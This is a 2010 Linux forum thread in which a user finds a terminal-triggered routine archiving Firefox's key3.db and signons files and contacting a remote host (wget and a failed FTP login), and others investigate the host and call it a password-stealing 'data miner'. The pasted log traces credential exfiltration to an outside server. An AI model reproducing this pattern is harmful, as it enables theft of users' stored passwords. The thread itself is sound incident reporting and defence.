Announcement

Collapse
No announcement yet.

Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

Collapse
This topic is closed.
X
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

    when i open a terminal i get this strange message

    key3.db
    tar: signons*.txt: Cannot stat: No such file or directory
    tar: Exiting with failure status due to previous errors
    --2010-01-11 17:39:27-- http://shiftytransfer.x10hosting.com/index.php
    Resolving shiftytransfer.x10hosting.com... 74.63.233.3
    Connecting to shiftytransfer.x10hosting.com|74.63.233.3|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `index.php'

    [ <=> ] 187 --.-K/s in 0s

    2010-01-11 17:39:30 (11.9 MB/s) - `index.php' saved [187]

    bash: warning: here-document at line 10 delimited by end-of-file (wanted `_EOF_')
    Login authentication failed
    Login failed.
    You aren't logged in
    ftp: bind: Address already in use
    garfilth@mine:~/.mozilla$ cd /home/garfilth/.mozilla
    garfilth@mine:~/.mozilla$ clear

    i delete .mozilla folder and it comes back. i have been to the website in the message and nothing there arpart from a 404 error and links to set up your own web hosting.

    other people are having the same prob over on the ubuntu forums.

    i get two files in my .mozilla folder called key3.db and unlucky.tar.gz. I will upload them if someone wants to have a look at them.

    i stumped.

    not sure if its malware or some other strange stuff.

    anyone else with this?

    thanks in advance
    Tags: None
    • Top
    • Bottom
    #2
    Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

    key3.db is a firefox file for storing passwords and user names.

    look here http://kb.mozillazine.org/Key3.db

    still dont know what Unlucky.tar.gz is and why its takes over the terminal.

    hope this helps a bit
    • Top
    • Bottom

    Comment

      #3
      Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

      signons2.txt contains the encrypted passwords: http://kb.mozillazine.org/Signons.txt

      But, I think that JohnnyG713 should purge FireFox and its addons and reinstall them, after changing his account password to something a little less obvious.
      "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
      – John F. Kennedy, February 26, 1962.
      • Top
      • Bottom

      Comment

        #4
        Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

        Appears to be associated with FireFox only, and I'm thinking a data miner written to exploit Mozilla, but maybe for Windoze? Several posts on this over on Ubuntuforums:

        Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder !!!!!!
        Gnome Terminal help

        A whois on shiftytransfer.x10hosting.com returns 'No match for "SHIFTYTRANSFER.X10HOSTING.COM".'
        A traceroute on shiftytransfer.x10hosting.com is masked after the 13th hop:

        13 2-233-63-74.reverse.lstn.net (74.63.233.2) 136.026 ms 134.720 ms 140.301 ms
        *
        *
        *
        *
        A ping to shiftytransfer.x10hosting.com doesn't make it past:
        64 bytes from 3-233-63-74.reverse.lstn.net (74.63.233.3): icmp_seq=50 ttl=55 time=137 ms
        Windows no longer obstructs my view.
        Using Kubuntu Linux since March 23, 2007.
        "It is a capital mistake to theorize before one has data." - Sherlock Holmes
        • Top
        • Bottom

        Comment

          #5
          Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

          Ya, the Ubuntu URL is where JohnnyG713 posted his plea for help!

          Your reverse IP is what I got for

          absolut.x10hosting.com

          ping shiftytransfer.x10hosting.com
          PING shiftytransfer.x10hosting.com (74.63.233.3) 56(84) bytes of data.
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=1 ttl=48 time=62.9 ms
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=2 ttl=48 time=58.2 ms
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=3 ttl=48 time=69.3 ms

          ...


          whois 74.63.233.3

          OrgName: Limestone Networks, Inc.
          OrgID: LIMES-2
          Address: 400 N. St. Paul
          City: Dallas
          StateProv: TX
          PostalCode: 75201
          Country: US

          ReferralServer: rwhois://rwhois.limestonenetworks.com:4321

          NetRange: 74.63.192.0 - 74.63.255.255
          CIDR: 74.63.192.0/18
          OriginAS: AS46475
          NetName: LSN-DLLSTX-3
          NetHandle: NET-74-63-192-0-1
          Parent: NET-74-0-0-0-0
          NetType: Direct Allocation
          NameServer: NS1.LIMESTONENETWORKS.COM
          NameServer: NS2.LIMESTONENETWORKS.COM
          NameServer: NS3.LIMESTONENETWORKS.COM
          Comment: http://www.limestonenetworks.com
          RegDate: 2008-08-29
          Updated: 2008-11-10

          RAbuseHandle: ABUSE1804-ARIN
          RAbuseName: Abuse
          RAbusePhone: +1-214-586-0555
          RAbuseEmail: abuse@limestonenetworks.com

          RNOCHandle: NOC2791-ARIN
          RNOCName: Network Operations Center
          RNOCPhone: +1-214-586-0555
          RNOCEmail: noc@limestonenetworks.com

          RTechHandle: NOC2791-ARIN
          RTechName: Network Operations Center
          RTechPhone: +1-214-586-0555
          RTechEmail: noc@limestonenetworks.com

          OrgAbuseHandle: ABUSE1804-ARIN
          OrgAbuseName: Abuse
          OrgAbusePhone: +1-214-586-0555
          OrgAbuseEmail: abuse@limestonenetworks.com

          OrgTechHandle: NOC2791-ARIN
          OrgTechName: Network Operations Center
          OrgTechPhone: +1-214-586-0555
          OrgTechEmail: noc@limestonenetworks.com

          # ARIN WHOIS database, last updated 2010-01-11 20:00
          # Enter ? for additional hints on searching ARIN's WHOIS database.
          #
          # ARIN WHOIS data and services are subject to the Terms of Use
          # available at https://www.arin.net/whois_tou.html


          Found a referral to rwhois.limestonenetworks.com:4321.

          getaddrinfo(rwhois.limestonenetworks.com): No address associated with hostname
          I think it was a "data miner" also, ... the "data" being login names and passwords.
          "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
          – John F. Kennedy, February 26, 1962.
          • Top
          • Bottom

          Comment

            #6
            Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

            IF in fact this is a data miner for addresses/passwords, you've got to admire the cojones of the creator for the name used on the zip file - Unlucky.tar.gz. I would never open such a named file!
            Windows no longer obstructs my view.
            Using Kubuntu Linux since March 23, 2007.
            "It is a capital mistake to theorize before one has data." - Sherlock Holmes
            • Top
            • Bottom

            Comment

              #7
              Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

              thanks all

              i backed up what i needed to and formated and reinstalled.

              seems to have worked.

              • Top
              • Bottom

              Comment

                #8
                Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

                FireFox "add-ons" and extensions are a hot topic with Mozilla right now.

                A list of "problematic" extensions is here.

                Mozilla is making noise about replacing the old addon technology with their new "jetpack" development sdk. Of, course, with so many developers having invested a lot of effort into creating addon applets there is grumbing.
                "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
                – John F. Kennedy, February 26, 1962.
                • Top
                • Bottom

                Comment

                Previous template Next
                Working...
                X